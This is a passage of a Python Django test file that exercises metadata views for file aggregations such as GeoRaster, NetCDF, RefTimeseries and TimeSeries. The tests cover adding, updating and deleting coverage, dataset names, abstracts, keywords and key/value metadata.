    self.assertEqual(temporal_coverage.value['end'], '2016-12-12')
    self.composite_resource.delete()
def test_delete_single_file_aggregation_coverage(self):
    """Deleting temporal and spatial coverage for a single file aggregation."""
    self.create_composite_resource(file_to_upload=self.text_file)
    res_file = self.composite_resource.files.first()
    # make the text file a GenericLogicalFile (single file) aggregation,
    # then run the shared coverage-deletion checks
    GenericLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
    self._test_delete_aggregation_coverage(file_type="GenericLogicalFile")
def test_delete_file_set_aggregation_coverage(self):
    """Deleting temporal and spatial coverage for a file set aggregation."""
    self.create_composite_resource()
    # create a folder with a text file and make it a file set aggregation,
    # then run the shared coverage-deletion checks
    fs_folder = 'fileset_folder'
    ResourceFile.create_folder(self.composite_resource, fs_folder)
    self.add_file_to_resource(file_to_add=self.text_file, upload_folder=fs_folder)
    FileSetLogicalFile.set_file_type(self.composite_resource, self.user, folder_path=fs_folder)
    self._test_delete_aggregation_coverage(file_type="FileSetLogicalFile")
def _test_delete_aggregation_coverage(self, file_type):
    """Shared checks for the delete_coverage_element view: create then delete a
    spatial and a temporal coverage element on the first file's aggregation,
    verifying the metadata dirty flag each time."""
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file

    # --- spatial coverage ---
    self.assertEqual(logical_file.metadata.spatial_coverage, None)
    point_value = {'east': '56.45678', 'north': '12.6789', 'units': 'Decimal degree'}
    logical_file.metadata.create_element('coverage', type='point', value=point_value)
    self.assertNotEqual(logical_file.metadata.spatial_coverage, None)
    # creating the element marks metadata dirty; reset the flag before deleting
    self.assertTrue(logical_file.metadata.is_dirty)
    logical_file.metadata.is_dirty = False
    logical_file.metadata.save()
    self.assertNotEqual(logical_file.metadata.spatial_coverage, None)
    url_kwargs = {'hs_file_type': file_type,
                  'file_type_id': logical_file.id,
                  'element_id': logical_file.metadata.spatial_coverage.id}
    request = self.factory.post(reverse('delete_file_coverage', kwargs=url_kwargs))
    request.user = self.user
    # view under test: delete the spatial coverage element
    response = delete_coverage_element(request, hs_file_type=file_type,
                                       file_type_id=logical_file.id,
                                       element_id=logical_file.metadata.spatial_coverage.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    self.assertEqual('success', json.loads(response.content)['status'])
    self.assertEqual(logical_file.metadata.spatial_coverage, None)
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    # deleting the element marks metadata dirty again
    self.assertTrue(logical_file.metadata.is_dirty)

    # --- temporal coverage ---
    self.assertEqual(logical_file.metadata.temporal_coverage, None)
    period_value = {'name': 'Name for period coverage', 'start': '1/1/2000', 'end': '12/12/2012'}
    logical_file.metadata.create_element('coverage', type='period', value=period_value)
    self.assertNotEqual(logical_file.metadata.temporal_coverage, None)
    # again reset the dirty flag before deleting
    self.assertTrue(logical_file.metadata.is_dirty)
    logical_file.metadata.is_dirty = False
    logical_file.metadata.save()
    self.assertNotEqual(logical_file.metadata.temporal_coverage, None)
    url_kwargs = {'hs_file_type': file_type,
                  'file_type_id': logical_file.id,
                  'element_id': logical_file.metadata.temporal_coverage.id}
    request = self.factory.post(reverse('delete_file_coverage', kwargs=url_kwargs))
    request.user = self.user
    # view under test: delete the temporal coverage element
    response = delete_coverage_element(request, hs_file_type=file_type,
                                       file_type_id=logical_file.id,
                                       element_id=logical_file.metadata.temporal_coverage.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    self.assertEqual('success', json.loads(response.content)['status'])
    self.assertEqual(logical_file.metadata.temporal_coverage, None)
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertTrue(logical_file.metadata.is_dirty)
    self.composite_resource.delete()
def test_add_update_raster_aggregation_metadata(self):
    """Test the add_metadata_element and update_metadata_element views for a
    raster aggregation (temporal coverage element)."""
    self.create_composite_resource(file_to_upload=self.raster_file)
    res_file = self.composite_resource.files.first()
    # make the tif file a GeoRaster aggregation
    GeoRasterLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertEqual(res_file.logical_file_type_name, "GeoRasterLogicalFile")
    # the raster aggregation starts without a temporal coverage element
    self.assertEqual(logical_file.metadata.temporal_coverage, None)
    url_kwargs = {'hs_file_type': 'GeoRasterLogicalFile',
                  'file_type_id': logical_file.id,
                  'element_name': 'coverage'}
    add_url = reverse('add_file_metadata', kwargs=url_kwargs)
    request = self.factory.post(add_url, data={'start': '1/1/2010', 'end': '12/12/2015'})
    request.user = self.user
    # view under test: add the temporal coverage element
    response = add_metadata_element(request, hs_file_type="GeoRasterLogicalFile",
                                    file_type_id=logical_file.id, element_name='coverage')
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    self.assertEqual('success', json.loads(response.content)['status'])
    # the raster aggregation now has a temporal coverage element
    self.assertNotEqual(logical_file.metadata.temporal_coverage, None)
    # view under test: update the temporal coverage element
    url_kwargs['element_id'] = logical_file.metadata.temporal_coverage.id
    update_url = reverse('update_file_metadata', kwargs=url_kwargs)
    request = self.factory.post(update_url, data={'start': '1/1/2011', 'end': '12/12/2016'})
    request.user = self.user
    response = update_metadata_element(request, hs_file_type="GeoRasterLogicalFile",
                                       file_type_id=logical_file.id, element_name='coverage',
                                       element_id=logical_file.metadata.temporal_coverage.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    self.assertEqual('success', json.loads(response.content)['status'])
    temporal_coverage = logical_file.metadata.temporal_coverage
    self.assertEqual(temporal_coverage.value['start'], '2011-01-01')
    self.assertEqual(temporal_coverage.value['end'], '2016-12-12')
    self.composite_resource.delete()
def test_add_update_netcdf_aggregation_metadata(self):
    """Test the 'update_metadata_element' view function for a NetCDF aggregation.

    Exercises updating the aggregation's temporal coverage, original (native)
    coverage, spatial coverage, and one variable element, asserting a
    'success' JSON response and the updated metadata values after each call.
    """
    self.create_composite_resource(file_to_upload=self.netcdf_file)
    res_file = self.composite_resource.files.first()
    # set the nc file to NetCDF File type
    NetCDFLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertEqual(res_file.logical_file_type_name, "NetCDFLogicalFile")
    # there should be temporal coverage for the netcdf file type
    # (extracted automatically from the .nc file during set_file_type)
    self.assertNotEqual(logical_file.metadata.temporal_coverage, None)
    temporal_coverage = logical_file.metadata.temporal_coverage
    self.assertEqual(temporal_coverage.value['start'], '2009-10-01 00:00:00')
    self.assertEqual(temporal_coverage.value['end'], '2010-05-30 23:00:00')
    url_params = {'hs_file_type': 'NetCDFLogicalFile',
                  'file_type_id': logical_file.id,
                  'element_name': 'coverage',
                  'element_id': logical_file.metadata.temporal_coverage.id
                  }
    # test updating temporal coverage
    url = reverse('update_file_metadata', kwargs=url_params)
    request = self.factory.post(url, data={'start': '1/1/2011', 'end': '12/12/2016'})
    request.user = self.user
    # this is the view function we are testing
    response = update_metadata_element(request, hs_file_type="NetCDFLogicalFile",
                                       file_type_id=logical_file.id, element_name='coverage',
                                       element_id=logical_file.metadata.temporal_coverage.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('success', response_dict['status'])
    # dates posted as m/d/yyyy are stored normalized to ISO yyyy-mm-dd
    temporal_coverage = logical_file.metadata.temporal_coverage
    self.assertEqual(temporal_coverage.value['start'], '2011-01-01')
    self.assertEqual(temporal_coverage.value['end'], '2016-12-12')
    # test updating OriginalCoverage element
    # there should be original coverage for the netcdf file type
    self.assertNotEqual(logical_file.metadata.original_coverage, None)
    orig_coverage = logical_file.metadata.original_coverage
    self.assertEqual(float(orig_coverage.value['northlimit']), 4.63515e+06)
    coverage_data = {'northlimit': 111.333, 'southlimit': 42.678, 'eastlimit': 123.789,
                     'westlimit': 40.789, 'units': 'meters'}
    url_params['element_name'] = 'originalcoverage'
    url_params['element_id'] = logical_file.metadata.original_coverage.id
    url = reverse('update_file_metadata', kwargs=url_params)
    request = self.factory.post(url, data=coverage_data)
    request.user = self.user
    # this is the view function we are testing
    response = update_metadata_element(request, hs_file_type="NetCDFLogicalFile",
                                       file_type_id=logical_file.id,
                                       element_name='originalcoverage',
                                       element_id=logical_file.metadata.original_coverage.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('success', response_dict['status'])
    orig_coverage = logical_file.metadata.original_coverage
    self.assertEqual(float(orig_coverage.value['northlimit']), 111.333)
    # test updating spatial coverage
    # there should be spatial coverage for the netcdf file type
    self.assertNotEqual(logical_file.metadata.spatial_coverage, None)
    spatial_coverage = logical_file.metadata.spatial_coverage
    self.assertEqual(float(spatial_coverage.value['northlimit']), 41.867126409)
    coverage_data = {'type': 'box', 'projection': 'WGS 84 EPSG:4326', 'northlimit': 41.87,
                     'southlimit': 41.863,
                     'eastlimit': -111.505,
                     'westlimit': -111.511, 'units': 'meters'}
    url_params['element_name'] = 'coverage'
    url_params['element_id'] = spatial_coverage.id
    url = reverse('update_file_metadata', kwargs=url_params)
    request = self.factory.post(url, data=coverage_data)
    request.user = self.user
    # this is the view function we are testing
    response = update_metadata_element(request, hs_file_type="NetCDFLogicalFile",
                                       file_type_id=logical_file.id,
                                       element_name='coverage',
                                       element_id=spatial_coverage.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('success', response_dict['status'])
    spatial_coverage = logical_file.metadata.spatial_coverage
    self.assertEqual(float(spatial_coverage.value['northlimit']), 41.87)
    # test update Variable element
    variable = logical_file.metadata.variables.first()
    variable_data = {'name': 'variable_name_updated', 'type': 'Int', 'unit': 'deg F',
                     'shape': 'variable_shape'}
    url_params['element_name'] = 'variable'
    url_params['element_id'] = variable.id
    url = reverse('update_file_metadata', kwargs=url_params)
    request = self.factory.post(url, data=variable_data)
    request.user = self.user
    # this is the view function we are testing
    response = update_metadata_element(request, hs_file_type="NetCDFLogicalFile",
                                       file_type_id=logical_file.id,
                                       element_name='variable',
                                       element_id=variable.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('success', response_dict['status'])
    # re-fetch the variable from the DB to see the persisted change
    variable = logical_file.metadata.variables.all().filter(id=variable.id).first()
    self.assertEqual(variable.name, 'variable_name_updated')
    self.composite_resource.delete()
def test_update_dataset_name_single_file_aggregation(self):
    """Test the 'update_dataset_name' view for a single file (generic) aggregation."""
    self.create_composite_resource(file_to_upload=self.raster_file)
    uploaded_file = self.composite_resource.files.first()
    # promote the uploaded tif file to a single file (generic) aggregation
    GenericLogicalFile.set_file_type(self.composite_resource, self.user, uploaded_file.id)
    new_dataset_name = "Updated dataset name for single file aggregation"
    self._test_update_dataset_name_aggregation(file_type="GenericLogicalFile",
                                               dataset_name=new_dataset_name)
def test_update_dataset_name_raster_aggregation(self):
    """Test the 'update_dataset_name' view for a geo raster aggregation."""
    self.create_composite_resource(file_to_upload=self.raster_file)
    uploaded_file = self.composite_resource.files.first()
    # promote the uploaded tif file to a geo raster aggregation
    GeoRasterLogicalFile.set_file_type(self.composite_resource, self.user, uploaded_file.id)
    new_dataset_name = "Updated dataset name for Geo Raster aggregation"
    self._test_update_dataset_name_aggregation(file_type="GeoRasterLogicalFile",
                                               dataset_name=new_dataset_name)
def test_update_dataset_name_netcdf_aggregation(self):
    """Test the 'update_dataset_name' view for a NetCDF aggregation."""
    self.create_composite_resource(file_to_upload=self.netcdf_file)
    uploaded_file = self.composite_resource.files.first()
    # promote the uploaded nc file to a NetCDF aggregation
    NetCDFLogicalFile.set_file_type(self.composite_resource, self.user, uploaded_file.id)
    new_dataset_name = "Updated dataset name for NetCDF aggregation"
    self._test_update_dataset_name_aggregation(file_type="NetCDFLogicalFile",
                                               dataset_name=new_dataset_name)
def test_update_dataset_name_file_set_aggregation(self):
    """Test the 'update_dataset_name' view for a file set aggregation."""
    self.create_composite_resource()
    fileset_folder = 'fileset_folder'
    ResourceFile.create_folder(self.composite_resource, fileset_folder)
    # put the text file into the new folder so the folder can become an aggregation
    self.add_file_to_resource(file_to_add=self.text_file, upload_folder=fileset_folder)
    # promote the folder to a file set aggregation
    FileSetLogicalFile.set_file_type(self.composite_resource, self.user,
                                     folder_path=fileset_folder)
    new_dataset_name = "Updated dataset name for File Set aggregation"
    self._test_update_dataset_name_aggregation(file_type="FileSetLogicalFile",
                                               dataset_name=new_dataset_name)
def _test_update_dataset_name_aggregation(self, file_type, dataset_name):
    """Shared helper: POST to the 'update_dataset_name' view and verify the change.

    :param file_type: logical file type name expected on the first resource file
        (e.g. "GeoRasterLogicalFile"); also used as the 'hs_file_type' URL kwarg
    :param dataset_name: new dataset name to set via the view function

    Asserts a 200 response with a 'success' JSON status and that the
    aggregation's dataset_name was persisted, then deletes the resource.
    """
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertEqual(res_file.logical_file_type_name, file_type)
    # check dataset_name before updating via the view function
    self.assertNotEqual(logical_file.dataset_name, dataset_name)
    url_params = {'hs_file_type': file_type,
                  'file_type_id': logical_file.id
                  }
    # NOTE: 'datatset' spelling matches the registered URL name
    url = reverse('update_filetype_datatset_name', kwargs=url_params)
    request = self.factory.post(url, data={'dataset_name': dataset_name})
    request.user = self.user
    # this is the view function we are testing
    response = update_dataset_name(request, hs_file_type=file_type,
                                   file_type_id=logical_file.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('success', response_dict['status'])
    # check dataset_name after updating via the view function
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertEqual(logical_file.dataset_name, dataset_name)
    self.composite_resource.delete()
def test_update_dataset_name_refts_aggregation_failure(self):
    """Test that 'update_dataset_name' fails for a reftimeseries aggregation
    whose json file already supplies the title element.

    The view should return an 'error' status and leave the dataset name
    unchanged.
    """
    self.create_composite_resource(file_to_upload=self.refts_file)
    res_file = self.composite_resource.files.first()
    # set the json file to RefTimeSeries File type
    RefTimeseriesLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertEqual(res_file.logical_file_type_name, "RefTimeseriesLogicalFile")
    # check dataset_name before updating via the view function
    # (this title comes from the uploaded refts json file)
    orig_dataset_name = "Sites, Variable"
    self.assertEqual(logical_file.dataset_name, orig_dataset_name)
    url_params = {'hs_file_type': 'RefTimeseriesLogicalFile',
                  'file_type_id': logical_file.id
                  }
    # NOTE: 'datatset' spelling matches the registered URL name
    url = reverse('update_filetype_datatset_name', kwargs=url_params)
    dataset_name = "Multiple sites with one variable"
    request = self.factory.post(url, data={'dataset_name': dataset_name})
    request.user = self.user
    # this is the view function we are testing
    response = update_dataset_name(request, hs_file_type="RefTimeseriesLogicalFile",
                                   file_type_id=logical_file.id)
    # view still responds 200; the failure is signalled in the JSON payload
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('error', response_dict['status'])
    # check dataset_name after updating via the view function
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    # dataset name should not have changed
    self.assertNotEqual(logical_file.dataset_name, dataset_name)
    self.assertEqual(logical_file.dataset_name, orig_dataset_name)
    self.composite_resource.delete()
def test_update_dataset_name_refts_aggregation_success(self):
    """Test that 'update_dataset_name' succeeds for a reftimeseries aggregation
    whose json file does NOT provide a value for the title element.
    """
    self.create_composite_resource(file_to_upload=self.refts_missing_title_file)
    res_file = self.composite_resource.files.first()
    # set the json file to RefTimeSeries File type
    RefTimeseriesLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    # the uploaded json file has no title -> updating the name is allowed
    self.assertFalse(logical_file.metadata.has_title_in_json)
    self.assertEqual(res_file.logical_file_type_name, "RefTimeseriesLogicalFile")
    # check dataset_name before updating via the view function
    self.assertEqual(logical_file.dataset_name, None)
    url_params = {'hs_file_type': 'RefTimeseriesLogicalFile',
                  'file_type_id': logical_file.id
                  }
    # NOTE: 'datatset' spelling matches the registered URL name
    url = reverse('update_filetype_datatset_name', kwargs=url_params)
    dataset_name = "Multiple sites with one variable"
    request = self.factory.post(url, data={'dataset_name': dataset_name})
    request.user = self.user
    # this is the view function we are testing
    response = update_dataset_name(request, hs_file_type="RefTimeseriesLogicalFile",
                                   file_type_id=logical_file.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('success', response_dict['status'])
    # check dataset_name after updating via the view function
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    # dataset name should have been changed
    self.assertEqual(logical_file.dataset_name, dataset_name)
    self.composite_resource.delete()
def test_update_abstract_refts_aggregation_failure(self):
    """Test that 'update_refts_abstract' fails when the refts json file
    already contains the abstract element.

    The view should return an 'error' status and leave the abstract
    unchanged.
    """
    self.create_composite_resource(file_to_upload=self.refts_file)
    res_file = self.composite_resource.files.first()
    # set the json file to RefTimeSeries File type
    RefTimeseriesLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertEqual(res_file.logical_file_type_name, "RefTimeseriesLogicalFile")
    # test that the abstract key is in json file
    self.assertTrue(logical_file.metadata.has_abstract_in_json)
    # check abstract before updating via the view function
    # (this abstract text comes from the uploaded refts json file)
    orig_abstract = "Discharge, cubic feet per second,Blue-green algae (cyanobacteria), " \
                    "phycocyanin data collected from 2016-04-06 to 2017-02-09 created on " \
                    "Thu Apr 06 2017 09:15:56 GMT-0600 (Mountain Daylight Time) from the " \
                    "following site(s): HOBBLE CREEK AT 1650 WEST AT SPRINGVILLE, UTAH, and " \
                    "Provo River at Charleston Advanced Aquatic. Data created by " \
                    "CUAHSI HydroClient: http://data.cuahsi.org/#."
    self.assertEqual(logical_file.metadata.abstract, orig_abstract)
    url_params = {'file_type_id': logical_file.id}
    url = reverse('update_reftimeseries_abstract', kwargs=url_params)
    new_abstract = "Discharge, cubic feet per second,Blue-green algae (cyanobacteria)"
    request = self.factory.post(url, data={'abstract': new_abstract})
    request.user = self.user
    # this is the view function we are testing
    response = update_refts_abstract(request, file_type_id=logical_file.id)
    # view still responds 200; the failure is signalled in the JSON payload
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('error', response_dict['status'])
    # check abstract after updating via the view function
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    # abstract should not have changed
    self.assertNotEqual(logical_file.metadata.abstract, new_abstract)
    self.assertEqual(logical_file.metadata.abstract, orig_abstract)
    self.composite_resource.delete()
def test_update_abstract_refts_aggregation_success(self):
    """Test that 'update_refts_abstract' succeeds when the refts json file
    doesn't have a value for the abstract element.
    """
    refts_missing_abstract_file_name = 'refts_valid_abstract_null.refts.json'
    refts_missing_abstract_file = 'hs_file_types/tests/{}'.format(
        refts_missing_abstract_file_name)
    self.create_composite_resource(file_to_upload=refts_missing_abstract_file)
    res_file = self.composite_resource.files.first()
    # set the json file to RefTimeSeries File type
    RefTimeseriesLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertEqual(res_file.logical_file_type_name, "RefTimeseriesLogicalFile")
    # test that the abstract key is not in json file
    self.assertFalse(logical_file.metadata.has_abstract_in_json)
    self.assertEqual(logical_file.metadata.abstract, None)
    url_params = {'file_type_id': logical_file.id}
    url = reverse('update_reftimeseries_abstract', kwargs=url_params)
    new_abstract = "Discharge, cubic feet per second,Blue-green algae (cyanobacteria)"
    request = self.factory.post(url, data={'abstract': new_abstract})
    request.user = self.user
    # this is the view function we are testing
    response = update_refts_abstract(request, file_type_id=logical_file.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('success', response_dict['status'])
    # check abstract after updating via the view function
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    # abstract should have changed
    self.assertEqual(logical_file.metadata.abstract, new_abstract)
    self.composite_resource.delete()
def test_update_abstract_timeseries_aggregation(self):
    """Test the 'update_timeseries_abstract' view function.

    Updating the abstract of a time series aggregation should succeed.
    """
    self.create_composite_resource(file_to_upload=self.sqlite_file)
    self.assertEqual(self.composite_resource.files.all().count(), 1)
    res_file = self.composite_resource.files.first()
    # set the sqlite file to TimeSeries file type
    TimeSeriesLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertEqual(res_file.logical_file_type_name, "TimeSeriesLogicalFile")
    url_params = {'file_type_id': logical_file.id}
    url = reverse('update_timeseries_abstract', kwargs=url_params)
    new_abstract = "Discharge, cubic feet per second,Blue-green algae (cyanobacteria)"
    request = self.factory.post(url, data={'abstract': new_abstract})
    request.user = self.user
    # this is the view function we are testing
    response = update_timeseries_abstract(request, file_type_id=logical_file.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('success', response_dict['status'])
    # check abstract after updating via the view function
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    # abstract should have changed
    self.assertEqual(logical_file.metadata.abstract, new_abstract)
    self.composite_resource.delete()
def test_get_timeseries_aggregation_metadata(self):
    """Test the 'get_timeseries_metadata' view function.

    Fetching metadata for a time series aggregation in edit mode, keyed by
    one of its series ids, should return a 'success' JSON response.
    """
    self.create_composite_resource(file_to_upload=self.sqlite_file)
    self.assertEqual(self.composite_resource.files.all().count(), 1)
    res_file = self.composite_resource.files.first()
    # set the sqlite file to TimeSeries file type
    TimeSeriesLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertEqual(res_file.logical_file_type_name, "TimeSeriesLogicalFile")
    # pick any series id extracted from the sqlite file
    series_id = logical_file.metadata.sites.first().series_ids[0]
    url_params = {'file_type_id': logical_file.id, 'series_id': series_id,
                  'resource_mode': 'edit'}
    url = reverse('get_timeseries_file_metadata', kwargs=url_params)
    new_abstract = "Discharge, cubic feet per second,Blue-green algae (cyanobacteria)"
    request = self.factory.post(url, data={'abstract': new_abstract})
    request.user = self.user
    # this is the view function we are testing
    response = get_timeseries_metadata(request, file_type_id=logical_file.id,
                                       series_id=series_id, resource_mode='edit')
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('success', response_dict['status'])
    self.composite_resource.delete()
def test_add_delete_keywords_refts_aggregation_failure(self):
    """Test 'add_keyword_metadata' and 'delete_keyword_metadata' view
    functions for a reftimeseries aggregation whose json file already has
    the keywords element.

    Both views should return an 'error' status and leave the original
    keywords untouched.
    """
    self.create_composite_resource(file_to_upload=self.refts_file)
    res_file = self.composite_resource.files.first()
    file_type = 'RefTimeseriesLogicalFile'
    # set the json file to RefTimeSeries File type
    RefTimeseriesLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertEqual(res_file.logical_file_type_name, file_type)
    # test that the keywords key is in json file
    self.assertTrue(logical_file.metadata.has_keywords_in_json)
    # check keywords before adding via the view function
    for kw in ('Time Series', 'CUAHSI'):
        self.assertIn(kw, logical_file.metadata.keywords)
    # add keywords at the file level
    url_params = {'hs_file_type': file_type,
                  'file_type_id': logical_file.id
                  }
    url = reverse('add_file_keyword_metadata', kwargs=url_params)
    request = self.factory.post(url, data={'keywords': 'keyword-1,keyword-2'})
    request.user = self.user
    # this is the view function we are testing
    response = add_keyword_metadata(request, hs_file_type=file_type,
                                    file_type_id=logical_file.id)
    # view still responds 200; the failure is signalled in the JSON payload
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('error', response_dict['status'])
    self.assertEqual(len(logical_file.metadata.keywords), 2)
    # check keywords after adding via the view function- should not have changed
    for kw in ('Time Series', 'CUAHSI'):
        self.assertIn(kw, logical_file.metadata.keywords)
    # delete keyword
    url = reverse('delete_file_keyword_metadata', kwargs=url_params)
    request = self.factory.post(url, data={'keyword': 'CUAHSI'})
    request.user = self.user
    # this is the view function we are testing
    response = delete_keyword_metadata(request, hs_file_type=file_type,
                                       file_type_id=logical_file.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('error', response_dict['status'])
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertEqual(len(logical_file.metadata.keywords), 2)
    # check keywords after deleting via the view function- should not have changed
    for kw in ('Time Series', 'CUAHSI'):
        self.assertIn(kw, logical_file.metadata.keywords)
    self.composite_resource.delete()
def test_add_delete_keywords_refts_aggregation_success(self):
    """Test 'add_keyword_metadata' and 'delete_keyword_metadata' view
    functions for a reftimeseries aggregation whose json file does NOT
    provide a value for the keyWords element.

    Adding two keywords and then deleting one should both succeed.
    """
    refts_missing_keywords_file_name = 'refts_valid_keywords_missing.refts.json'
    refts_missing_keywords_file = 'hs_file_types/tests/{}'.format(
        refts_missing_keywords_file_name)
    self.create_composite_resource(file_to_upload=refts_missing_keywords_file)
    res_file = self.composite_resource.files.first()
    file_type = 'RefTimeseriesLogicalFile'
    # set the json file to RefTimeSeries File type
    RefTimeseriesLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id,)
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertEqual(res_file.logical_file_type_name, file_type)
    # test that the keywords key is not in json file
    self.assertFalse(logical_file.metadata.has_keywords_in_json)
    self.assertEqual(len(logical_file.metadata.keywords), 0)
    # add keywords at the file level
    url_params = {'hs_file_type': file_type,
                  'file_type_id': logical_file.id
                  }
    url = reverse('add_file_keyword_metadata', kwargs=url_params)
    request = self.factory.post(url, data={'keywords': 'keyword-1,keyword-2'})
    request.user = self.user
    # this is the view function we are testing
    response = add_keyword_metadata(request, hs_file_type=file_type,
                                    file_type_id=logical_file.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('success', response_dict['status'])
    # check keywords after adding via the view function- should have keywords now
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertEqual(len(logical_file.metadata.keywords), 2)
    for kw in ('keyword-1', 'keyword-2'):
        self.assertIn(kw, logical_file.metadata.keywords)
    # delete keyword
    url = reverse('delete_file_keyword_metadata', kwargs=url_params)
    request = self.factory.post(url, data={'keyword': 'keyword-1'})
    request.user = self.user
    # this is the view function we are testing
    response = delete_keyword_metadata(request, hs_file_type=file_type,
                                       file_type_id=logical_file.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('success', response_dict['status'])
    # check keywords after deleting via the view function- one keyword should have been deleted
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertEqual(len(logical_file.metadata.keywords), 1)
    self.assertIn('keyword-2', logical_file.metadata.keywords)
    self.composite_resource.delete()
def test_CRUD_key_value_metadata_raster_aggregation(self):
    """Test 'update_key_value_metadata' and 'delete_key_value_metadata' view
    functions for a geo raster aggregation.

    Covers create, key+value update, value-only update, and delete of
    extra (key/value) metadata.
    """
    self.create_composite_resource(file_to_upload=self.raster_file)
    res_file = self.composite_resource.files.first()
    # set the tif file to GeoRasterFile type
    GeoRasterLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertEqual(res_file.logical_file_type_name, "GeoRasterLogicalFile")
    # no key/value metadata for the raster file type yet
    self.assertEqual(logical_file.metadata.extra_metadata, {})
    url_params = {'hs_file_type': 'GeoRasterLogicalFile',
                  'file_type_id': logical_file.id
                  }
    url = reverse('update_file_keyvalue_metadata', kwargs=url_params)
    request = self.factory.post(url, data={'key': 'key-1', 'value': 'value-1'})
    request.user = self.user
    # this is the view function we are testing
    response = update_key_value_metadata(request, hs_file_type="GeoRasterLogicalFile",
                                         file_type_id=logical_file.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('success', response_dict['status'])
    # now there should be key/value metadata for the raster file type
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertNotEqual(logical_file.metadata.extra_metadata, {})
    self.assertEqual(logical_file.metadata.extra_metadata['key-1'], 'value-1')
    # update existing key value metadata - updating both key and value
    # ('key_original' identifies which existing entry to replace)
    request = self.factory.post(url, data={'key': 'key-2', 'value': 'value-2',
                                           'key_original': 'key-1'})
    request.user = self.user
    response = update_key_value_metadata(request, hs_file_type="GeoRasterLogicalFile",
                                         file_type_id=logical_file.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('success', response_dict['status'])
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertEqual(logical_file.metadata.extra_metadata['key-2'], 'value-2')
    self.assertNotIn('key-1', logical_file.metadata.extra_metadata.keys())
    # update existing key value metadata - updating value only
    request = self.factory.post(url, data={'key': 'key-2', 'value': 'value-1',
                                           'key_original': 'key-2'})
    request.user = self.user
    response = update_key_value_metadata(request, hs_file_type="GeoRasterLogicalFile",
                                         file_type_id=logical_file.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('success', response_dict['status'])
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertEqual(logical_file.metadata.extra_metadata['key-2'], 'value-1')
    # delete key/value data using the view function
    request = self.factory.post(url, data={'key': 'key-2'})
